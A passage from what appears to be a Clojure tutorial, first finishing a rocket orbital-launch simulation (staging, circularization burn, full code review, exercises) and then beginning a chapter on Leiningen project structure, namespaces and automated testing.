 {:velocity {:x 0.45154055666826204, :y 463.8312116386399, :z -6.000769315822031E-16},
  :position {:x 6378137, :y 463.8312116386399, :z 0},
  :dry-mass 50050,
  :fuel-mass 71681400/253,
  :time 1,
  :isp 3050,
  :max-fuel-rate 284450/253,
  :max-thrust 4152000.0}
 {:velocity {:x 0.9376544222659078, :y 463.83049896253056, :z -1.200153863164406E-15},
  :position {:x 6378137.451540557, :y 927.6624232772798, :z -6.000769315822031E-16},
  :dry-mass 50050,
  :fuel-mass 71396950/253,
  :time 2,
  :isp 3050,
  :max-fuel-rate 284450/253,
  :max-thrust 4152000.0})

Notice that each map is like a frame of a movie, playing at one frame per second. We can make the simulation more or less accurate by raising or lowering the framerate–adjusting the parameter fed to trajectory. For now, though, we’ll stick with one-second intervals.

How high above the surface is the rocket?

(defn altitude
  "The height above the surface of the equator, in meters."
  [craft]
  (-> craft
      :position
      cartesian->spherical
      :r
      (- earth-equatorial-radius)))

Now we can explore the rocket’s path as a series of altitudes over time:

user=> (->> (atlas-v) prepare (trajectory 1) (map altitude) (take 10) pprint)
(0.0
 0.016865378245711327
 0.519002066925168
 1.540983198210597
 3.117615718394518
 5.283942770212889
 8.075246102176607
 11.52704851794988
 15.675116359256208
 20.555462017655373)

The million dollar question, though, is whether the rocket breaks orbit.

(defn above-ground?
  "Is the craft at or above the surface?"
  [craft]
  (<= 0 (altitude craft)))

(defn flight
  "The above-ground portion of a trajectory."
  [trajectory]
  (take-while above-ground? trajectory))

(defn crashed?
  "Does this trajectory crash into the surface before 100 hours are up?"
  [trajectory]
  (let [time-limit (* 100 3600)] ; 100 hours
    (not (every? above-ground?
                 (take-while #(<= (:time %) time-limit) trajectory)))))

(defn crash-time
  "Given a trajectory, returns the time the rocket impacted the ground."
  [trajectory]
  (:time (last (flight trajectory))))

(defn apoapsis
  "The highest altitude achieved during a trajectory."
  [trajectory]
  (apply max (map altitude (flight trajectory))))

(defn apoapsis-time
  "The time of apoapsis"
  [trajectory]
  (:time (apply max-key altitude (flight trajectory))))

If the rocket goes below ground, we know it crashed. If the rocket stays in orbit, the trajectory will never end. That makes it a bit tricky to tell whether the rocket is in a stable orbit or not, because we can’t ask about every element, or the last element, of an infinite sequence: it’ll take infinite time to evaluate. Instead, we’ll assume that the rocket should crash within the first, say, 100 hours; if it makes it past that point, we’ll assume it made orbit successfully. With these functions in hand, we’ll write a test in test/scratch/rocket_test.clj to see whether or not the launch is successful:

(deftest makes-orbit
  (let [trajectory (->> (atlas-v)
                        prepare
                        (trajectory 1))]
    (when (crashed? trajectory)
      (println "Crashed at" (crash-time trajectory) "seconds")
      (println "Maximum altitude" (apoapsis trajectory)
               "meters at" (apoapsis-time trajectory) "seconds"))

    ; Assert that the rocket eventually made it to orbit.
    (is (not (crashed? trajectory)))))

aphyr@waterhouse:~/scratch$ lein test scratch.rocket-test

lein test scratch.rocket-test
Crashed at 982 seconds
Maximum altitude 753838.039645385 meters at 532 seconds

lein test :only scratch.rocket-test/makes-orbit

FAIL in (makes-orbit) (rocket_test.clj:26)
expected: (not (crashed? trajectory))
  actual: (not (not true))

Ran 2 tests containing 3 assertions.
1 failures, 0 errors.
Tests failed.

We made it to an altitude of 750 kilometers, and crashed 982 seconds after launch. We’re gonna need a bigger boat.

Stage II

The Atlas V isn’t big enough to make it into orbit on its own. It carries a second stage, the Centaur, which is much smaller and uses more efficient engines.

(defn centaur
  "The upper rocket stage.
  http://en.wikipedia.org/wiki/Centaur_(rocket_stage)
  http://www.astronautix.com/stages/cenaurde.htm"
  []
  {:dry-mass      2361
   :fuel-mass     13897
   :isp           4354
   :max-fuel-rate (/ 13897 470)})

The Centaur lives inside the Atlas V main stage. We’ll re-write atlas-v to take an argument: its next stage.

(defn atlas-v
  "The full launch vehicle. http://en.wikipedia.org/wiki/Atlas_V"
  [next-stage]
  {:dry-mass      50050
   :fuel-mass     284450
   :isp           3050
   :max-fuel-rate (/ 284450 253)
   :next-stage    next-stage})

Now, in our tests, we’ll construct the rocket like so:

(let [trajectory (->> (atlas-v (centaur))
                      prepare
                      (trajectory 1))]

When we exhaust the fuel reserves of the primary stage, we’ll de-couple the main booster from the Centaur. In terms of our simulation, the Atlas V will be replaced by its next stage, the Centaur. We’ll write a function stage which separates the vehicles when ready:

(defn stage
  "When fuel reserves are exhausted, separate stages. Otherwise, return craft
  unchanged."
  [craft]
  (cond
    ; Still fuel left
    (pos? (:fuel-mass craft))
    craft

    ; No remaining stages
    (nil? (:next-stage craft))
    craft

    ; Stage!
    :else
    (merge (:next-stage craft)
           (select-keys craft [:time :position :velocity]))))

We’re using cond to handle three distinct cases: when there’s fuel remaining in the craft, when there is no stage to separate, and when we’re ready for stage separation. Separation is easy: we simply return the next stage of the current craft, with the current craft’s time, position, and velocity merged in.

Finally, we’ll have to update our step function to take into account the possibility of stage separation.

(defn step [craft dt]
  (let [craft (stage craft)]
    (assoc craft
           ; Time advances by dt seconds
           :time      (+ dt (:time craft))
           ; We burn some fuel
           :fuel-mass (- (:fuel-mass craft) (* dt (fuel-rate craft)))
           ; Our position changes based on our velocity
           :position  (merge-with + (:position craft)
                                    (scale dt (:velocity craft)))
           ; And our velocity changes based on our acceleration
           :velocity  (merge-with + (:velocity craft)
                                    (scale dt (acceleration craft))))))

Same as before, only now we call stage prior to the physics simulation. Let’s try a launch.

aphyr@waterhouse:~/scratch$ lein test scratch.rocket-test

lein test scratch.rocket-test
Crashed at 2415 seconds
Maximum altitude 4598444.289945109 meters at 1446 seconds

lein test :only scratch.rocket-test/makes-orbit

FAIL in (makes-orbit) (rocket_test.clj:27)
expected: (not (crashed? trajectory))
  actual: (not (not true))

Ran 2 tests containing 3 assertions.
1 failures, 0 errors.
Tests failed.

Still crashed–but we increased our apoapsis from 750 kilometers to 4,598 kilometers. That’s plenty high, but we’re still not making orbit. Why? Because we’re going straight up, then straight back down. To orbit, we need to move sideways, around the earth.

Orbital insertion

Our spacecraft is shooting upwards, but in order to remain in orbit around the earth, it has to execute a second burn: an orbital injection maneuver. That injection maneuver is also called a circularization burn because it turns the orbit from an ascending parabola into a circle (or something roughly like it). We don’t need to be precise about circularization–any trajectory that doesn’t hit the planet will suffice. All we have to do is burn towards the horizon, once we get high enough.

To do that, we’ll need to enhance the rocket’s control software. We assumed that the rocket would always thrust in the +x direction; but now we’ll need to thrust in multiple directions. We’ll break up the engine force into two parts: thrust (how hard the rocket motor pushes) and orientation (which determines the direction the rocket is pointing.)

(defn unit-vector
  "Scales coordinates to magnitude 1."
  [coordinates]
  (scale (/ (magnitude coordinates)) coordinates))

(defn engine-force
  "The force vector, each component in Newtons, due to the rocket engine."
  [craft]
  (scale (thrust craft)
         (unit-vector (orientation craft))))

We’re taking the orientation of the craft–some coordinates–and scaling it to be of length one with unit-vector. Then we’re scaling the orientation vector by the thrust, returning a thrust vector.
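A quick sanity check at the REPL (assuming the functions above are loaded; the vectors are chosen just for illustration):

```clojure
user=> (unit-vector {:x 0.0 :y 0.0 :z 2.0})
{:x 0.0, :y 0.0, :z 1.0}
user=> (unit-vector {:x 2.0 :y 0.0 :z 0.0})
{:x 1.0, :y 0.0, :z 0.0}
```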

As we go back and redefine parts of the program, you might see an error like

Exception in thread "main" java.lang.RuntimeException: Unable to resolve symbol: unit-vector in this context, compiling:(scratch/rocket.clj:69:11)
	at clojure.lang.Compiler.analyze(Compiler.java:6380)
	at clojure.lang.Compiler.analyze(Compiler.java:6322)

This is a stack trace from the Clojure compiler. It indicates that in scratch/rocket.clj, on line 69, column 11, we used the symbol unit-vector–but it didn’t have a meaning at that point in the program. Perhaps unit-vector is defined below that line. There are two ways to solve this.

  1. Organize your functions so that the simple ones come first, and those that depend on them come later. Read this way, namespaces tell a story, progressing from smaller to bigger, more complex problems.

  2. Sometimes, ordering functions this way is impossible, or would put related ideas too far apart. In this case you can (declare unit-vector) near the top of the namespace. This tells Clojure that unit-vector isn’t defined yet, but it’ll come later.
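Here's a minimal, hypothetical sketch of the second approach (caller and helper are names invented for this example):

```clojure
;; caller and helper are hypothetical names, just for illustration.
(declare helper)   ; promise the compiler that helper is defined later

(defn caller
  "Calls helper, which appears further down the file."
  [x]
  (helper x))

(defn helper
  [x]
  (inc x))

;; (caller 1) => 2
```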

Now that we’ve broken up engine-force into thrust and orientation, we have to control the thrust properly for our two burns. We’ll start by defining the times for the initial ascent and circularization burn, expressed as vectors of start and end times, in seconds.

(def ascent
  "The start and end times for the ascent burn."
  [0 300])

(def circularization
  "The start and end times for the circularization burn."
  [400 1000])

Now we’ll change the thrust by adjusting the rate of fuel consumption. Instead of burning at maximum until running out of fuel, we’ll execute two distinct burns.

(defn fuel-rate
  "How fast is fuel, in kilograms/second, consumed by the craft?"
  [craft]
  (cond
    ; Out of fuel
    (<= (:fuel-mass craft) 0)
    0

    ; Ascent burn
    (<= (first ascent) (:time craft) (last ascent))
    (:max-fuel-rate craft)

    ; Circularization burn
    (<= (first circularization) (:time craft) (last circularization))
    (:max-fuel-rate craft)

    ; Shut down engines otherwise
    :else 0))

We’re using cond to express four distinct possibilities: that we’ve run out of fuel, that we’re executing the ascent or circularization burn, or that the engines are otherwise shut down. Because the comparison function <= takes any number of arguments and asserts that they occur in order, expressing intervals like “the time is between the first and last times in the ascent” is easy.
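For example:

```clojure
user=> (<= 0 150 300)
true
user=> (<= 0 450 300)
false
```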

Finally, we need to determine the direction to burn in. This one’s gonna require some tricky linear algebra. You don’t need to worry about the specifics here–the goal is to find out what direction the rocket should burn to fly towards the horizon, in a circle around the planet. We’re doing that by taking the rocket’s velocity vector, and flattening out the velocity towards or away from the planet. All that’s left is the direction the rocket is flying around the earth.

(defn dot-product
  "Finds the inner product of two x, y, z coordinate maps. See
  http://en.wikipedia.org/wiki/Dot_product."
  [c1 c2]
  (+ (* (:x c1) (:x c2))
     (* (:y c1) (:y c2))
     (* (:z c1) (:z c2))))

(defn projection
  "The component of coordinate map a in the direction of coordinate map b.
  See http://en.wikipedia.org/wiki/Vector_projection."
  [a b]
  (let [b (unit-vector b)]
    (scale (dot-product a b) b)))

(defn rejection
  "The component of coordinate map a *not* in the direction of coordinate
  map b."
  [a b]
  (let [a' (projection a b)]
    {:x (- (:x a) (:x a'))
     :y (- (:y a) (:y a'))
     :z (- (:z a) (:z a'))}))
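To get a feel for what projection and rejection do, here's a REPL sketch with simple values (assuming the functions above are loaded):

```clojure
user=> (projection {:x 3.0 :y 4.0 :z 0.0} {:x 1.0 :y 0.0 :z 0.0})
{:x 3.0, :y 0.0, :z 0.0}
user=> (rejection {:x 3.0 :y 4.0 :z 0.0} {:x 1.0 :y 0.0 :z 0.0})
{:x 0.0, :y 4.0, :z 0.0}
```

Rejecting the spacecraft's velocity against its position vector works the same way: it strips out the vertical component, leaving only the horizontal part of the motion.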

With the mathematical underpinnings ready, we’ll define the orientation control software:

(defn orientation
  "What direction is the craft pointing?"
  [craft]
  (cond
    ; Initially, point along the *position* vector of the craft--that is
    ; to say, straight up, away from the earth.
    (<= (first ascent) (:time craft) (last ascent))
    (:position craft)

    ; During the circularization burn, we want to burn *sideways*, in the
    ; direction of the orbit. We'll find the component of our velocity
    ; which is aligned with our position vector (that is to say, the vertical
    ; velocity), and subtract the vertical component. All that's left is the
    ; *horizontal* part of our velocity.
    (<= (first circularization) (:time craft) (last circularization))
    (rejection (:velocity craft) (:position craft))

    ; Otherwise, just point straight ahead.
    :else
    (:velocity craft)))

For the ascent burn, we’ll push straight away from the planet. For circularization, we use the rejection function to find the part of the velocity around the planet, and thrust in that direction. By default, we’ll leave the rocket pointing in the direction of travel.

With these changes made, the rocket should execute two burns. Let’s re-run the tests and see.

aphyr@waterhouse:~/scratch$ lein test scratch.rocket-test

lein test scratch.rocket-test

Ran 2 tests containing 3 assertions.
0 failures, 0 errors.

We finally did it! We’re rocket scientists!

Review

(ns scratch.rocket)

;; Linear algebra for {:x 1 :y 2 :z 3} coordinate vectors.

(defn map-values
  "Applies f to every value in the map m."
  [f m]
  (into {}
        (map (fn [pair]
               [(key pair) (f (val pair))])
             m)))

(defn magnitude
  "What's the radius of a given set of cartesian coordinates?"
  [c]
  ; By the Pythagorean theorem...
  (Math/sqrt (+ (Math/pow (:x c) 2)
                (Math/pow (:y c) 2)
                (Math/pow (:z c) 2))))

(defn scale
  "Multiplies a map of x, y, and z coordinates by the given factor."
  [factor coordinates]
  (map-values (partial * factor) coordinates))

(defn unit-vector
  "Scales coordinates to magnitude 1."
  [coordinates]
  (scale (/ (magnitude coordinates)) coordinates))

(defn dot-product
  "Finds the inner product of two x, y, z coordinate maps. See
  http://en.wikipedia.org/wiki/Dot_product"
  [c1 c2]
  (+ (* (:x c1) (:x c2))
     (* (:y c1) (:y c2))
     (* (:z c1) (:z c2))))

(defn projection
  "The component of coordinate map a in the direction of coordinate map b.
  See http://en.wikipedia.org/wiki/Vector_projection."
  [a b]
  (let [b (unit-vector b)]
    (scale (dot-product a b) b)))

(defn rejection
  "The component of coordinate map a *not* in the direction of coordinate
  map b."
  [a b]
  (let [a' (projection a b)]
    {:x (- (:x a) (:x a'))
     :y (- (:y a) (:y a'))
     :z (- (:z a) (:z a'))}))

;; Coordinate conversion

(defn cartesian->spherical
  "Converts a map of Cartesian coordinates :x, :y, and :z to spherical
  coordinates :r, :theta, and :phi."
  [c]
  (let [r (magnitude c)]
    {:r     r
     :phi   (Math/acos (/ (:z c) r))
     :theta (Math/atan (/ (:y c) (:x c)))}))

(defn spherical->cartesian
  "Converts spherical to Cartesian coordinates."
  [c]
  {:x (* (:r c) (Math/cos (:theta c)) (Math/sin (:phi c)))
   :y (* (:r c) (Math/sin (:theta c)) (Math/sin (:phi c)))
   :z (* (:r c) (Math/cos (:phi c)))})

;; The earth

(def earth-equatorial-radius
  "Radius of the earth, in meters"
  6378137)

(def earth-day
  "Length of an earth day, in seconds."
  86400)

(def earth-equatorial-speed
  "How fast points on the equator move, relative to the center of the earth,
  in meters/sec."
  (/ (* 2 Math/PI earth-equatorial-radius)
     earth-day))

(def g "Acceleration of gravity in meters/s^2" -9.8)

(def initial-space-center
  "The initial position and velocity of the launch facility"
  {:time     0
   :position {:x earth-equatorial-radius
              :y 0
              :z 0}
   :velocity {:x 0
              :y earth-equatorial-speed
              :z 0}})

;; Craft

(defn centaur
  "The upper rocket stage.
  http://en.wikipedia.org/wiki/Centaur_(rocket_stage)
  http://www.astronautix.com/stages/cenaurde.htm"
  []
  {:dry-mass      2361
   :fuel-mass     13897
   :isp           4354
   :max-fuel-rate (/ 13897 470)})

(defn atlas-v
  "The full launch vehicle. http://en.wikipedia.org/wiki/Atlas_V"
  [next-stage]
  {:dry-mass      50050
   :fuel-mass     284450
   :isp           3050
   :max-fuel-rate (/ 284450 253)
   :next-stage    next-stage})

;; Flight control

(def ascent
  "The start and end times for the ascent burn."
  [0 300])

(def circularization
  "The start and end times for the circularization burn."
  [400 1000])

(defn orientation
  "What direction is the craft pointing?"
  [craft]
  (cond
    ; Initially, point along the *position* vector of the craft--that is
    ; to say, straight up, away from the earth.
    (<= (first ascent) (:time craft) (last ascent))
    (:position craft)

    ; During the circularization burn, we want to burn *sideways*, in the
    ; direction of the orbit. We'll find the component of our velocity
    ; which is aligned with our position vector (that is to say, the vertical
    ; velocity), and subtract the vertical component. All that's left is the
    ; *horizontal* part of our velocity.
    (<= (first circularization) (:time craft) (last circularization))
    (rejection (:velocity craft) (:position craft))

    ; Otherwise, just point straight ahead.
    :else
    (:velocity craft)))

(defn fuel-rate
  "How fast is fuel, in kilograms/second, consumed by the craft?"
  [craft]
  (cond
    ; Out of fuel
    (<= (:fuel-mass craft) 0)
    0

    ; Ascent burn
    (<= (first ascent) (:time craft) (last ascent))
    (:max-fuel-rate craft)

    ; Circularization burn
    (<= (first circularization) (:time craft) (last circularization))
    (:max-fuel-rate craft)

    ; Shut down engines otherwise
    :else 0))

(defn stage
  "When fuel reserves are exhausted, separate stages. Otherwise, return craft
  unchanged."
  [craft]
  (cond
    ; Still fuel left
    (pos? (:fuel-mass craft))
    craft

    ; No remaining stages
    (nil? (:next-stage craft))
    craft

    ; Stage!
    :else
    (merge (:next-stage craft)
           (select-keys craft [:time :position :velocity]))))

;; Dynamics

(defn thrust
  "How much force, in newtons, do the craft's rocket engines exert?"
  [craft]
  (* (fuel-rate craft) (:isp craft)))

(defn mass
  "The total mass of a craft."
  [craft]
  (+ (:dry-mass craft) (:fuel-mass craft)))

(defn gravity-force
  "The force vector, each component in Newtons, due to gravity."
  [craft]
  ; Since force is mass times acceleration...
  (let [total-force (* g (mass craft))]
    (-> craft
        ; Now we'll take the craft's position
        :position
        ; in spherical coordinates,
        cartesian->spherical
        ; replace the radius with the gravitational force...
        (assoc :r total-force)
        ; and transform back to Cartesian-land
        spherical->cartesian)))

(declare altitude)

(defn engine-force
  "The force vector, each component in Newtons, due to the rocket engine."
  [craft]
  ; Debugging; useful for working through trajectories in detail.
  ; (println craft)
  ; (println "t " (:time craft) "alt" (altitude craft) "thrust" (thrust craft))
  ; (println "fuel" (:fuel-mass craft))
  ; (println "vel " (:velocity craft))
  ; (println "ori " (unit-vector (orientation craft)))
  (scale (thrust craft)
         (unit-vector (orientation craft))))

(defn total-force
  "Total force on a craft."
  [craft]
  (merge-with + (engine-force craft)
                (gravity-force craft)))

(defn acceleration
  "Total acceleration of a craft."
  [craft]
  (let [m (mass craft)]
    (scale (/ m) (total-force craft))))

(defn step [craft dt]
  (let [craft (stage craft)]
    (assoc craft
           ; Time advances by dt seconds
           :time      (+ dt (:time craft))
           ; We burn some fuel
           :fuel-mass (- (:fuel-mass craft) (* dt (fuel-rate craft)))
           ; Our position changes based on our velocity
           :position  (merge-with + (:position craft)
                                    (scale dt (:velocity craft)))
           ; And our velocity changes based on our acceleration
           :velocity  (merge-with + (:velocity craft)
                                    (scale dt (acceleration craft))))))

;; Launch and flight

(defn prepare
  "Prepares a craft for launch from an equatorial space center."
  [craft]
  (merge craft initial-space-center))

(defn trajectory
  "Returns all future states of the craft, at dt-second intervals."
  [dt craft]
  (iterate #(step % dt) craft))

;; Analyzing trajectories

(defn altitude
  "The height above the surface of the equator, in meters."
  [craft]
  (-> craft
      :position
      cartesian->spherical
      :r
      (- earth-equatorial-radius)))

(defn above-ground?
  "Is the craft at or above the surface?"
  [craft]
  (<= 0 (altitude craft)))

(defn flight
  "The above-ground portion of a trajectory."
  [trajectory]
  (take-while above-ground? trajectory))

(defn crashed?
  "Does this trajectory crash into the surface before 10 hours are up?"
  [trajectory]
  (let [time-limit (* 10 3600)] ; 10 hours
    (not (every? above-ground?
                 (take-while #(<= (:time %) time-limit) trajectory)))))

(defn crash-time
  "Given a trajectory, returns the time the rocket impacted the ground."
  [trajectory]
  (:time (last (flight trajectory))))

(defn apoapsis
  "The highest altitude achieved during a trajectory."
  [trajectory]
  (apply max (map altitude (flight trajectory))))

(defn apoapsis-time
  "The time of apoapsis"
  [trajectory]
  (:time (apply max-key altitude (flight trajectory))))

As written here, our first non-trivial program tells a story–though a different one than the process of exploration and refinement that brought the rocket to orbit. It builds from small, abstract ideas: linear algebra and coordinates; physical constants describing the universe for the simulation; and the basic outline of the spacecraft. Then we define the software controlling the rocket: the times for the burns, how much to thrust, in what direction, and when to separate stages. Using those control functions, we build a physics engine including gravity and thrust forces, and use Newton’s second law to build a basic Euler method solver. Finally, we analyze the trajectories the solver produces to answer key questions: how high, how long, and did it explode?

We used Clojure’s immutable data structures–mostly maps–to represent the state of the universe, and defined pure functions to interpret those states and construct new ones. Using iterate, we projected a single state forward into an infinite timeline of the future–evaluated as demanded by the analysis functions. Though we pay a performance penalty, immutable data structures, pure functions, and lazy evaluation make simulating complex systems easier to reason about.
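
The shape of that technique fits in a few lines. Here's a toy version (the `tick` function and one-key state map are stand-ins, not the simulator's actual code):

```clojure
;; A toy version of the simulation loop: a pure step function over an
;; immutable state map, projected forward with iterate.
(defn tick
  "Advances a state map by one second. A stand-in for the simulator's step."
  [state]
  (update-in state [:time] inc))

;; iterate returns a lazy, infinite timeline of successive states;
;; nothing is computed until an analysis function demands it.
(def timeline (iterate tick {:time 0}))

(take 3 timeline)
;; => ({:time 0} {:time 1} {:time 2})
```

Because the timeline is lazy, asking for three states computes exactly three; the infinite tail costs nothing until someone looks at it.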

Had we written this simulation in a different language, different techniques might have come into play. In Java, C++, or Ruby, we would have defined a hierarchy of datatypes called classes, each one representing a small piece of state. We might define a Craft type, and create subtypes Atlas and Centaur. We’d create a Coordinate type, subdivided into Cartesian and Spherical, and so on. The types add complexity and rigidity, but also prevent mis-spellings, and can prevent us from interpreting, say, coordinates as craft or vice versa.

To move the system forward in a language emphasizing mutable data structures, we would have updated the time and coordinates of a single craft in-place. This introduces additional complexity, because many of the changes we made depended on the current values of the craft. To ensure the correct ordering of calculations, we’d scatter temporary variables and explicit copies throughout the code, ensuring that functions didn’t see inconsistent pictures of the craft state. The mutable approach would likely be faster, but would still demand some copying of data, and sacrifice clarity.

More imperative languages place less emphasis on laziness, and make it harder to express ideas like map and take. We might have simulated the trajectory for some fixed time, constructing a history of all the intermediate results we needed, then analyzed it by moving explicitly from slot to slot in that history, checking if the craft had crashed, and so on.
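
We could mimic that eager, fixed-length style in Clojure with an explicit loop. This is a sketch–`tick` and `eager-history` are hypothetical names, not part of the simulator:

```clojure
(defn tick
  "A stand-in step function: advances a state map by one second."
  [state]
  (update-in state [:time] inc))

(defn eager-history
  "Eagerly runs tick n times from an initial state, returning a vector of
  every intermediate state--the kind of fixed-length history an imperative
  program might build up front, then walk slot by slot."
  [n initial]
  (loop [history [initial]]
    (if (< (count history) (inc n))
      (recur (conj history (tick (peek history))))
      history)))

(eager-history 3 {:time 0})
;; => [{:time 0} {:time 1} {:time 2} {:time 3}]
```

Unlike the lazy timeline, every state here is computed immediately, whether or not the analysis ever needs it.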

Across all these languages, though, some ideas remain the same. We solve big problems by breaking them up into smaller ones. We use data structures to represent the state of the system, and functions to alter that state. Comments and docstrings clarify the story of the code, making it readable to others. Tests ensure the software is correct, and allow us to work piecewise towards a solution.

Exercises

  1. We know the spacecraft reached orbit, but we have no idea what that orbit looks like. Since the trajectory is infinite in length, we can’t ask about the entire history using max–but we know that all orbits have a high and low point. At the highest point, the difference between successive altitudes changes from increasing to decreasing, and at the lowest point, the difference between successive altitudes changes from decreasing to increasing. Using this technique, refine the apoapsis function to find the highest point using that inflection in altitudes–and write a corresponding periapsis function that finds the lowest point in the orbit. Display both periapsis and apoapsis in the test suite.

  2. We assumed the force of gravity resulted in a constant 9.8 meter/second/second acceleration towards the earth, but in the real world, gravity falls off with the inverse square law. Using the mass of the earth, mass of the spacecraft, and Newton’s constant, refine the gravitational force used in this simulation to take Newton’s law into account. How does this affect the apoapsis?

  3. We ignored the atmosphere, which exerts drag on the craft as it moves through the air. Write a basic air-density function which falls off with altitude. Make some educated guesses as to how much drag a real rocket experiences, and assume that the drag force is proportional to the square of the rocket’s velocity. Can your rocket still reach orbit?

  4. Notice that the periapsis and apoapsis of the rocket are different. By executing the circularization burn carefully, can you make them the same–achieving a perfectly circular orbit? One way to do this is to pick an orbital altitude and velocity of a known satellite–say, the International Space Station–and write the control software to match that velocity at that altitude.

Previously, we covered state and mutability.

Up until now, we’ve been programming primarily at the REPL. However, the REPL is a limited tool. While it lets us explore a problem interactively, that interactivity comes at a cost: changing an expression requires retyping the entire thing, editing multi-line expressions is awkward, and our work vanishes when we restart the REPL–so we can’t share our programs with others, or run them again later. Moreover, programs in the REPL are hard to organize. To solve large problems, we need a way of writing programs durably–so they can be read and evaluated later.

In addition to the code itself, we often want to store ancillary information. Tests verify the correctness of the program. Resources like precomputed databases, lookup tables, images, and text files provide other data the program needs to run. There may be documentation: instructions for how to use and understand the software. A program may also depend on code from other programs, which we call libraries, packages, or dependencies. In Clojure, we have a standardized way to bind together all these parts into a single directory, called a project.

Project structure

We created a project at the start of this book by using Leiningen, the Clojure project tool.

$ lein new scratch

scratch is the name of the project, and also the name of the directory where the project’s files live. Inside the project are a few files.

$ cd scratch; ls
doc  project.clj  README.md  resources  src  target  test

project.clj defines the project: its name, its version, dependencies, and so on. Notice the name of the project (scratch) comes first, followed by the version (0.1.0-SNAPSHOT). -SNAPSHOT versions are for development; you can change them at any time, and any projects which depend on the snapshot will pick up the most recent changes. A version which does not end in -SNAPSHOT is fixed: once published, it always points to the same version of the project. This allows projects to specify precisely which projects they depend on. For example, scratch’s project.clj says scratch depends on org.clojure/clojure version 1.5.1.

(defproject scratch "0.1.0-SNAPSHOT"
  :description "FIXME: write description"
  :url "http://example.com/FIXME"
  :license {:name "Eclipse Public License"
            :url "http://www.eclipse.org/legal/epl-v10.html"}
  :dependencies [[org.clojure/clojure "1.5.1"]])

README.md is the first file most people open when they look at a new project, and Lein generates a generic readme for you to fill in later. We call this kind of scaffolding or example a “stub”; it’s just there to remind you what sort of things to write yourself. You’ll notice the readme includes the name of the project, some notes on what it does and how to use it, a copyright notice where your name should go, and a license, which sets the legal terms for the use of the project. By default, Leiningen suggests the Eclipse Public License, which allows everyone to use and modify the software, so long as they preserve the license information.

The doc directory is for documentation; sometimes hand-written, sometimes automatically generated from the source code. resources is for additional files, like images. src is where Clojure code lives, and test contains the corresponding tests. Finally, target is where Leiningen stores compiled code, built packages, and so on.

Namespaces

Every lein project starts out with a stub namespace containing a simple function. Let’s take a look at that namespace now–it lives in src/scratch/core.clj:

(ns scratch.core)

(defn foo
  "I don't do a whole lot."
  [x]
  (println x "Hello, World!"))

The first part of this file defines the namespace we’ll be working in. The ns macro lets the Clojure compiler know that all following code belongs in the scratch.core namespace. Remember, scratch is the name of our project. scratch.core is for the core functions and definitions of the scratch project. As projects expand, we might add new namespaces to separate our work into smaller, more understandable pieces. For instance, Clojure’s primary functions live in clojure.core, but there are auxiliary functions for string processing in clojure.string, functions for interoperating with Java’s input-output system in clojure.java.io, for printing values in clojure.pprint, and so on.

def, defn, and peers always work in the scope of a particular namespace. The function foo in scratch.core is different from the function foo in scratch.pad.

scratch.foo=> (ns scratch.core)
nil
scratch.core=> (def foo "I'm in core")
#'scratch.core/foo
scratch.core=> (ns scratch.pad)
nil
scratch.pad=> (def foo "I'm in pad!")
#'scratch.pad/foo

Notice the full names of these vars are different: scratch.core/foo vs scratch.pad/foo. You can always refer to a var by its fully qualified name: the namespace, followed by a slash /, followed by the short name.

Inside a namespace, symbols resolve to variables which are defined in that namespace. So in scratch.pad, foo refers to scratch.pad/foo.

scratch.pad=> foo
"I'm in pad!"

Namespaces automatically include clojure.core by default, which is where all the standard functions, macros, and special forms come from. let, defn, filter, vector, etc. all live in clojure.core, but are automatically included in new namespaces so we can refer to them by their short names.

Notice that the values for foo we defined in scratch.pad and scratch.core aren’t available in other namespaces, like user.

scratch.pad=> (ns user)
nil
user=> foo

CompilerException java.lang.RuntimeException: Unable to resolve symbol: foo in this context, compiling:(NO_SOURCE_PATH:1:602)

To access things from other namespaces, we have to require them in the namespace definition.

user=> (ns user (:require [scratch.core]))
nil
user=> scratch.core/foo
"I'm in core"

The :require part of the ns declaration told the compiler that the user namespace needed access to scratch.core. We could then refer to the fully qualified name scratch.core/foo.

Often, writing out the full namespace is cumbersome–so you can give a short alias for a namespace like so:

user=> (ns user (:require [scratch.core :as c]))
nil
user=> c/foo
"I'm in core"

The :as directive indicates that anywhere we write c/something, the compiler should expand that to scratch.core/something. If you plan on using a var from another namespace often, you can refer it to the local namespace–which means you may omit the namespace qualifier entirely.

user=> (ns user (:require [scratch.core :refer [foo]]))
nil
user=> foo
"I'm in core"

You can refer functions into the current namespace by listing them: [foo bar ...]. Alternatively, you can suck in every function from another namespace by saying :refer :all:

user=> (ns user (:require [scratch.core :refer :all]))
nil
user=> foo
"I'm in core"

Namespaces control complexity by isolating code into more understandable, related pieces. They make it easier to read code by keeping similar things together, and unrelated things apart. By making dependencies between namespaces explicit, they make it clear how groups of functions relate to one another.

If you’ve worked with Erlang, Modula-2, Haskell, Perl, or ML, you’ll find namespaces analogous to modules or packages. Namespaces are often large, encompassing hundreds of functions; and most projects use only a handful of namespaces.

By contrast, object-oriented programming languages like Java, Scala, Ruby, and Objective C organize code in classes, which combine names and state in a single construct. Because all functions in a class operate on the same state, object-oriented languages tend to have many classes with fewer functions in each. It’s not uncommon for a typical Java project to define hundreds or thousands of classes containing only one or two functions each. If you come from an object-oriented language, it can feel a bit unusual to combine so many functions in a single scope–but because functional programs isolate state differently, this is normal. If, on the other hand, you move to an object-oriented language after Clojure, remember that OO languages compose differently. Objects with hundreds of functions are usually considered unwieldy and should be split into smaller pieces.

Code and tests

It’s perfectly fine to test small programs in the REPL. We’ve written and refined hundreds of functions that way: by calling the function and seeing what happens. However, as programs grow in scope and complexity, testing them by hand becomes harder and harder. If you change the behavior of a function which ten other functions rely on, you may have to re-test all ten by hand. In real programs, a small change can alter thousands of distinct behaviors, all of which should be verified.

Wherever possible, we want to automate software tests–making the test itself another program. If the test suite runs in a matter of seconds, we can make changes freely–re-running the tests continuously to verify that everything still works.

As a simple example, let’s write and test a single function in src/scratch/core.clj. How about exponentiation–raising a number to the given power?

(ns scratch.core)

(defn pow
  "Raises base to the given power. For instance, (pow 3 2) returns three
  squared, or nine."
  [base power]
  (apply * (repeat base power)))

So we repeat the base power times, then call * with that sequence of bases to multiply them all together. Seems straightforward enough. Now we need to test it.

By default, all lein projects come with a simple test stub. Let’s see it in action by running lein test.

aphyr@waterhouse:~/scratch$ lein test

lein test scratch.core-test

lein test :only scratch.core-test/a-test

FAIL in (a-test) (core_test.clj:7)
FIXME, I fail.
expected: (= 0 1)
  actual: (not (= 0 1))

Ran 1 tests containing 1 assertions.
1 failures, 0 errors.
Tests failed.

